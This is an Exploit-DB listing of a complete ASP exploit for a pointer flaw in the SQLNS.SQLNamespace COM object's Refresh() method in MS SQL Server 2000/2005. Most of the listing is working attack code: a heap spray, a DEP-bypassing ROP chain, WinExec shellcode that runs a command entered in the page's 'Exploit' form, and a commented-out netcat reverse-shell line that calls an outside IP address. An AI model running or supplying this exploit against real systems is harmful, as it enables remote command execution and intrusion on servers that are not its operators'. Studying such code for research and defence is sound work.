MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer

EDB-ID:

38005

CVE:

N/A


Author:

ylbhz

Type:

remote


Platform:

Windows

Date:

2015-08-29


<%
Function Padding(intLen)
	Dim strRet, intSize
	intSize = intLen/2 - 1
	For I = 0 To intSize Step 1
		strRet = strRet & unescape("%u4141")
	Next
	Padding = strRet
End Function

Function PackDWORD(strPoint)
	strTmp = replace(strPoint, "0x", "")
	PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
	PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
End Function

Function PackList(arrList)
	For Each Item In arrList
		PackList = PackList & PackDWORD(Item)
	Next
End Function

Function PackShellcode(strCode)
	intLen = Len(strCode) / 4
	If intLen Mod 2 = 1 Then
		strCode = strCode & "\x90"
		intLen = intLen + 1
	End If
	arrTmp = Split(strCode, "\x")
	For I = 1 To UBound(arrTmp) Step 2
		PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
	Next
End Function

Function UnicodeToAscii(uStrIn)
	intLen = Len(strCommand)
	If intLen Mod 2 = 1 Then
		For I = 1 To intLen - 1 Step 2
			UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
		Next
		UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1)))
	Else
		For I = 1 To intLen - 1 Step 2
			UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
		Next
	End If
	UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
End Function

'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
Rop_Chain = Array(_
"0x41414141", _
"0x7c373ab6", _
"0x7c3425bc", _
"0x7c376fc5", _
"0x7c343423", _
"0x7c3415a2", _
"0x7c373ab6", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x7c344dbe", _
"0x7c376fc5", _
"0x7c373ab6", _
"0x7c373ab6", _
"0x7c351cc5", _
"0x7c3912a3", _
"0x7c3427e5", _
"0x7c346c0b", _
"0x7c3590be", _
"0x7c37a151", _
"0x7c378c81", _
"0x7c345c30"  _
)
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
'0C0C0C6C   64:8B25 00000000          MOV ESP,DWORD PTR FS:[0]
'0C0C0C73   EB 07                     JMP SHORT 0C0C0C7C
'0C0C0C75   90                        NOP
'0C0C0C76   90                        NOP
'0C0C0C77   90                        NOP
'12 bytes
Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
'0C0C0C7C   83EC 24                   SUB ESP,24
'0C0C0C7F   8BEC                      MOV EBP,ESP
'0C0C0C81   83C5 30                   ADD EBP,30
'8 bytes
'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
'D9EE            FLDZ
'9B              WAIT
'D97424 F4       FSTENV (28-BYTE) PTR SS:[ESP-C]
'5E              POP ESI
'83C6 1a                   ADD ESI,1a
'33C0                      XOR EAX,EAX
'50                        PUSH EAX
'56                        PUSH ESI
'68 F1F8807C               PUSH kernel32.ExitThread
'68 1641867C               PUSH kernel32.WinExec
'C3                        RETN
'''''''''''''''''''''''''''''main
Dim strCmd

strCmd = Request("cmd")
strCommand = "cmd.exe /q /c " & strCmd
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"

strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
intOpcode = Len(strOpcode)

Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_
PackShellcode(Fix_ESP) & strOpcode &_
Padding(928 - intOpcode*2)
'Response.Write Len(Payload)
Dim Block
For N = 1 to 512
	Block = Block & Payload
Next
Dim spary()
For I = 0 To 200 Step 1
	Redim Preserve spary(I)
	spary(I) = Block
Next

If strCmd = "" Then
	Response.Write "Please Input command! <br />"
Else
	Set obj = CreateObject("SQLNS.SQLNamespace")
	Response.Write "Try to Execute: " & strCommand
	arg1 = 202116108 '0x0c0c0c0c
	obj.Refresh arg1
End If
%>
<html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title>
<body>
<p>
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br />
Other version not test :) <br />
Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br />
</P>

<form action="" method="post">
Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit">
</form>
</form>